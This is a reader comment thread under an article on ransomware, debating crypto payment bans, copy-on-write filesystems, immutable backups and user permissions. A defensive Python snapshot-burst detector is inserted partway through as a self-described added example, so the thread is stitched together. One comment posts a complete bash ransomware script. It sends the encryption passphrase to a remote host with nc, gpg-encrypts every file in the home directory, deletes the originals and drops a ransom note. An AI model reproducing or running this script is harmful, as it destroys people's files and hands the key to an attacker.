What do ransomware and Jesus have in common? A birth month and an unwillingness to die

Your Christmas holidays looked quite different in the '80s to how they do today. While some will remember what it was like to wake up on the 25th back then, some of you won't even have been born. The food hasn't changed much. Turkey, stuffing, Brussels sprouts… that's all been around for some time. Yet what some call the good …

  1. druck Silver badge

    You know the solution

    As the article mentions, ransomware only really took off with the advent of payment by cryptocurrency; remove that from the equation and 99.99% of the criminal enterprise will disappear overnight. I'm sure someone will still attempt to get paid by a suitcase of cash under a bridge, or a Western Union transfer, but the chances of many payments reaching remote criminals sitting pretty in sanctioned countries without extradition are infeasibly small.

    1. DS999 Silver badge

      Re: You know the solution

      And you don't even have to outlaw cryptocurrency. Just make it illegal to use for criminal enterprise or anything related to it, which would immediately make it illegal to use crypto to pay ransom (or to buy illegal drugs etc.)

      Before anyone laughs at the idea of making using something in a crime illegal, that's already been done many times: e.g. possession of a gun isn't illegal, but if you are carrying one when committing a felony it upgrades the charges. Or Al Capone getting put in Alcatraz not for all his criming, but for failing to pay taxes on the money he made from criming.

      It would be interesting to see how far the bitcoin price would fall if laws against paying ransom were made and enforced in the US & EU.

    2. Anonymous Coward

      Re: You know the solution

      As you may or may not be aware, fiat currency is not your money. It's the government's money and they can remove it at a whim. Just because they haven't done it yet, doesn't mean they won't. And it's not just the government, it's also their agents such as the credit card companies and the banks.

      I went to Florida on holiday for 2 weeks and found out on day 2 that the bank had decided to block my cards until I presented myself at a bank in the UK. I had informed them I was going on holiday in plenty of time, but blocked they remained.

      Oddly enough, the day I returned to the UK, my cards miraculously started working again without me going anywhere near a branch.

      Got a £900 payout from the bank for that after complaining to the relevant authorities.

      Not your keys, not your coins.

      With fiat currencies, you NEVER hold the keys.

      P.S. It's a little tiring when people keep suggesting that crypto is only used by criminals. 99.999% of crime involves conventional fiat currency.

  2. John Riddoch

    Part of the problem with Ransomware is how to stop it. At its heart, it's editing files a user can access and most users can access a lot of files as part of their work (or home systems). All you have to do is get the victim to run something which proves annoyingly easy, despite the cyber security training most of us are subjected to. You can't remove a user's access to files without stopping them doing their job, so what do you do? If that problem can be solved, ransomware becomes less of a threat.

    1. Paul Crawford Silver badge

      All you have to do is get the victim to run something which proves annoyingly easy

      And therein lies the main (technical) problem. User access control in the classical system was about stopping a user screwing with other users' files, not their own, on the assumption that nobody is that dumb but malice is a risk. Alas...

      You can remove local execute permissions on file systems to make it much harder, but these days with web browsers able to run arbitrary code from outside it is only part of the way there, not to mention the ever-dumb aspect of email attachments being able to run code (e.g. Adobe PDF doing far, far more than just print-ready formatting).

    2. Bitsminer Silver badge

      At its heart, it's editing files a user can access...

      Which may be the heart of the problem.

      Filesystems have not changed much in the last, oh, 50 years. Create a file, append to it, delete it. As long as you have the "authority", that is you are the owner, you have no "accountability", proof that your intentions (or the hacker imposter's intentions) were good.

      Change the filesystems to something more database like ("rollback transaction") or git-like ("reset HEAD^") then much hackery is foiled. Not all perhaps, but lots.

      Then "encrypt all files" becomes, whether hacker likes it or not, "encrypt all current files", and a rollback undoes this.

      Yes, yes, yes, I can hear the architects muttering about control planes and security rings and defending this imaginary new filesystem itself. In truth, firewalls and security features already stop 99.9% of attacks, it's the 0.1% that make the headlines. More security features like trustworthy and reversible filesystems might make that 0.0001%.

      1. Blazde Silver badge

        Re: At its heart, it's editing files a user can access...

        Downvoted because I disagree this is anything like a core solution but it's still an intriguing line of thinking.

        Filesystems that somehow, at the hardware level, never delete anything would be a privacy nightmare. They would also fill up with junk very rapidly - although storage is impressively cheap so that's becoming less of an obstacle. Finer-grained permissions around deleting data, append-only backups, snapshots and so on, all these technologies exist already but they're hassle to set up and maintain, and they're susceptible to vulnerabilities like any other software, and susceptible to misconfiguration and user mistake like any other permission system. So they can only ever be one of many lines of defence that realistically only the richest most security-conscious organisations use effectively. Most organisations are not rich of course. They cut corners wherever possible, the market incentivises that. It's the entire basis of our modern economy. It's very difficult to see how that changes dramatically, with either altered market incentives or state-enforced legislation.

        Historically societies stop crime effectively by disincentivising crime itself, not by expecting all non-criminals to do more than the minimum to constantly defend themselves against kidnappers and thieves and so on. It would be too expensive if I had to defend my home, car, person, and family from free-roaming armed gangs. Of course I make some efforts to secure my possessions, but even in countries where law enforcement has completely broken down there is a limit to what can be done.

        So I'm not sure the current situation will change very much until the pariah countries that tolerate and/or fund cyber-criminals are brought into the global fold, or cut off from the internet and digital currencies, or something. Obviously that's not happening soon. Until then baby steps to increase security, going after the crims to whatever extent possible are still positive, but not anything approaching a solution.

        1. Richard 12 Silver badge
          Boffin

          Re: At its heart, it's editing files a user can access...

          There are already several filesystems that don't delete; instead they copy-on-write. To limit the size, "old" versions are eventually deleted.

          These make spotting ransomware trivial - the size-on-disk suddenly dramatically increases as large widespread changes (the encryption) occur, and thus it's incredibly simple to detect and "pull the plug" before anything is actually lost.

          On top of that, it's simpler to fix as you can just roll back to a previous state. Good data created during the attack itself may still be lost, but it's better than most backup strategies alone.

          Obviously this won't help at all if the attacker gets root as they can abuse the ability to prune and restore, so it's not a panacea.
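The detection Richard 12 describes (and the rollback Bitsminer wants), turned into a check over copy-on-write snapshot accounting, as an added example that is not from the article or any commenter. It assumes output shaped like `zfs list -H -t snapshot -o name,written` (tab-separated snapshot name and space written since the previous snapshot); the sample rows and the thresholds are constructed assumptions.

```python
"""Spot a ransomware-style burst of rewrites from copy-on-write snapshot
accounting. On a CoW filesystem the old blocks survive under the previous
snapshot, so the space written per snapshot interval jumps when thousands of
files are re-encrypted at once.

Added example, not code from the article or any commenter. SAMPLE is a
constructed imitation of `zfs list -H -t snapshot -o name,written` output
(tab-separated name and human-readable size); the thresholds are assumptions.
"""
import re
import statistics

UNITS = {"": 1, "B": 1, "K": 1024, "M": 1024 ** 2, "G": 1024 ** 3, "T": 1024 ** 4}


def parse_size(text):
    """Convert a zfs-style size such as '1.5M' or '0' into bytes."""
    m = re.fullmatch(r"(\d+(?:\.\d+)?)([BKMGT]?)", text.strip())
    if not m:
        raise ValueError(f"unrecognised size: {text!r}")
    value, unit = m.groups()
    return int(float(value) * UNITS[unit])


def parse_snapshots(text):
    """Return [(snapshot_name, bytes_written_in_interval), ...] in list order."""
    rows = []
    for line in text.splitlines():
        if line.strip():
            name, written = line.split("\t")
            rows.append((name, parse_size(written)))
    return rows


def find_bursts(rows, factor=10.0, window=4, floor=1024 ** 2):
    """Flag snapshots whose written space exceeds `factor` times the median of
    the previous `window` intervals and also exceeds `floor` bytes, so a quiet
    dataset with tiny deltas cannot trip the check on noise."""
    flagged = []
    for i in range(window, len(rows)):
        baseline = statistics.median(w for _, w in rows[i - window:i])
        name, written = rows[i]
        if written > floor and written > factor * max(baseline, 1):
            flagged.append(name)
    return flagged


# Constructed sample: hourly snapshots of a home dataset. The last two rows show
# the whole dataset being rewritten, which is the signal the thread describes.
SAMPLE = (
    "tank/home@h01\t3.2M\ntank/home@h02\t1.1M\ntank/home@h03\t4.8M\n"
    "tank/home@h04\t2.5M\ntank/home@h05\t0\ntank/home@h06\t2.9M\n"
    "tank/home@h07\t14.6G\ntank/home@h08\t9.1G\n"
)

if __name__ == "__main__":
    for snap in find_bursts(parse_snapshots(SAMPLE)):
        print(f"write burst before {snap}: hold snapshot pruning and investigate")
```

A flagged snapshot is the one to keep rather than prune, since the interval before it still holds the unencrypted blocks to roll back to.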

      2. Paul Crawford Silver badge

        Re: At its heart, it's editing files a user can access...

        Having a backup is a major step forward, but the issue here is most people are also the administrator so if they can be tricked into running software it can remove an on-device backup (such as file system snapshots a la ZFS).

        You need immutable backups, and on different media so a lost/damaged machine is not a loss of data. That means a different management interface/credentials and a 2nd device which costs in money, time, and business process. Few care until after they are screwed...

    3. DS999 Silver badge

      You can't stop it

      Trying to fix it through "more security" isn't going to work any better than fixing the problem of illegal drugs has with "more cops".

      You have to make it illegal to pay ransom, and illegal to offer ransomware insurance. Will that create some initial pain? Yes. But that pain would have been a lot smaller if it had been done when I started advocating for this 6 or 7 years ago. And that pain will be a lot higher if we wait 6 or 7 more years before we finally give up the stupidity of trying to secure our way out of it and bite the bullet.

      1. Richard 12 Silver badge

        Re: You can't stop it

        Weeelll, ransomware insurance itself is fine.

        Insurance to cover the cost of re-securing and recovery afterwards is a reasonable concept - if only because coverage will certainly require a documented backup and disaster recovery plan. It shouldn't be commercially viable, but that's up to the businesses to price.

        It's the "paying a ransom" part that needs to be illegal - and involve personal consequences for authorisation. So if the insurer pays the ransom, the insurance manager or CEO authorising it goes to prison. Same as the other corruption laws around paying bribes.

  3. ComicalEngineer

    One of the problems is that software has become too complicated and thus there are too many vulnerabilities at so many levels within the code. IMHO one of the main objectives of software writers should be to build security into the code; of course that doesn't make any money, and new features are what seem to sell software.

    The other issue, of course, is dumb users who will download infected files. One of my old companies had this happen where a member of the accounts department downloaded an "invoice" from an unknown source - the sender wasn't even on the supplier list and the attachment was an .exe file - and promptly infected all of the accounts department (about 30 PCs) with a trojan. Fortunately we had our own IT team at the time and they caught it quickly having picked up a spike in network traffic. Nonetheless it stopped all accounts transactions for over a week.

  4. GNU Enjoyer
    Angel

    Ransomware is a problem inherent to proprietary OS's

    Those are the only OS's insecure enough for ransomware to be effective - if you run a free OS instead, don't run proprietary malware (including remote arbitrary code execution via JS in a web browser) and keep internet-accessing software updated, suddenly you are pretty much immune to anything but a directly targeted attack by a skilled cracker.

    Yes, if you keep running windows, it's only a question of time before you get hit by ransomware.

    The solution is to install GNU/Linux today.

    Ransomware is not particularly hard to write either, as below is one example of GNU/Linux ransomware I found, but due to its basic security design, all that can do is encrypt files in the user's $HOME directory and even then this script is totally harmless in the filesystem of a competent GNU user, as the software does not get executed unless the user chooses to set the executable bit and then execute it (and of course any user who knows anything about GNU bash and gnupg will not execute the below script):

    #!/bin/bash
    # Copyright © 2024 翠星石
    # This program is free software: you can redistribute it and/or modify
    # it under the terms of the GNU Affero General Public License as published by
    # the Free Software Foundation, either version 3 of the License, or
    # (at your option) any later version.
    #
    # This program is distributed in the hope that it will be useful,
    # but WITHOUT ANY WARRANTY; without even the implied warranty of
    # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
    # GNU Affero General Public License for more details.
    #
    # You should have received a copy of the GNU Affero General Public License
    # along with this program. If not, see <https://www.gnu.org/licenses/>.
    RANDOM_PASSWORD="$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM"
    ID="$RANDOM$RANDOM"
    echo $ID:$RANDOM_PASSWORD | nc not-ransomware-server.biz 6969
    find "$HOME" -type f -exec gpg --symmetric --batch --passphrase $RANDOM_PASSWORD {} \;
    find "$HOME" -type f -not -name '*.gpg' -exec rm {} \;
    echo "All your files have been encrypted, make a breadstick payment to <x> and quote ID: $ID to receive a decryption password." > "$HOME"/README-encrypted.txt

    1. Bebu sa Ware
      Coat

      Re: Ransomware is a problem inherent to proprietary OS's

      I suspect the result of bash evaluating "$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM$RANDOM" won't be all that more random than $RANDOM.

  5. sitta_europea Silver badge

    Quoting the article:

    "... It's a shame Popp died when he did..."

    On the contrary, I'd have said that it's a shame he didn't die sixteen years earlier.

  6. Mentat74
    Joke

    What do ransomware and Jesus have in common?

    They are both being used to steal people's money...

    1. ecofeco Silver badge

      Re: What do ransomware and Jesus have in common?

      BA DUMP BA!!

    2. Winkypop Silver badge

      Re: What do ransomware and Jesus have in common?

      But wait!

      A late contender for post of the year.

      1. Richard 71

        Re: What do ransomware and Jesus have in common?

        You are wrong. Jesus WAS willing to die - that is the heart of the gospel!

        The good news is that He died on the cross (and us with Him) for all our sins.

        ...and He rose again (and us with Him) and is now seated at the right hand of God.

  7. Anonymous Coward

    Simple solution

    Disk is very cheap, it just needs firmware that only writes new files. Save an existing file and it just creates a new one or a diff, leaving the existing file in place. Encrypting a file creates a new file and doesn't alter the existing data. Nothing on the disk can be written to more than once. Basically a WORM drive. Sensitive data will need to be treated separately and the cost of securing that data is offset by the reduction in quantity as most data isn't that sensitive.

  8. amanfromMars 1 Silver badge

    Rogues or Heroes, Renegades or Saviours, Saints or Sinners ?

    Or just a Another Glitch in the Force to be Fixed?

    Cybercriminals now [ie 20 odd years ago] had the means to reach victims en masse thanks to the internet combined with cyber hygiene levels that were still fairly poor. ..... Connor Jones/El Reg

    After the passing of more than two decades of experience and opportunity, Connor, have lessons been learned and are effective practices deployed for all to enjoy greater virtual security and improved cyber hygiene levels, or are things still fairly poor ..... and even a great deal worse than earlier with many more instances of critical vulnerabilities in vital systems and utilities being ably exploited by increasing levels of sophisticated 0day and Disruptive Anonymous Trojan Attack which then itself opens up further opportunities enabling greater advancing developments in future alien leading fields of both practical human and remote virtual metadataphysical endeavour?

    1. amanfromMars 1 Silver badge

      Re: Rogues or Heroes, Renegades or Saviours, Saints or Sinners and Superunnatural Reckonings

      And for those able to reply truthfully and not be fooling themselves into the cold comfort of a psychotic state of delusional denial are the answers to those questions ...... No, No, Yes and Yes with the final Yes launching a multitude of further truthful inconvenient and uncomfortable answers questioning the future suitability of human leadership in constantly failing exclusive elite executive administrative systems should such leadership deny they are responsible and accountable for what is an expanding catastrophic problem of their own making in dire straits need of third party fixing seeds and feeds.

      have lessons been learned? ...... No

      are effective practices deployed?.... No

      are things still fairly poor?....Yes

      and even a great deal worse than earlier with many more instances of critical vulnerabilities in vital systems and utilities being ably exploited by increasing levels of sophisticated 0day and Disruptive Anonymous Trojan Attack which then itself opens up further opportunities enabling greater advancing developments in future alien leading fields of both practical human and remote virtual metadataphysical endeavour? .... Yes

  9. harrys Bronze badge

    if u get dun for ransomware ur crap!

    nicely written article :)

    either....

    1) ur not that good at ur job

    2) u have not been given adequate resources/time to do ur job - begging the question.... why are u still there?

    3) ur boss when told of the remedy, understands, but doesnt give a shite because he's a tight arseole - again begging the question, what are u doing there?

    bottom line .... u dont try to prevent ransomware, fools errand, u put in systems/procedures (and some training) into minimizing downtime and disruption when it happens ... AND IT'S GOING TO COST A LOT... mainly in storage/software

    the more money u throw at it the lower the disruption period!

    it's one of the few problems that can actually be fixed by throwing enough money at it.... a very rare thing indeed :)
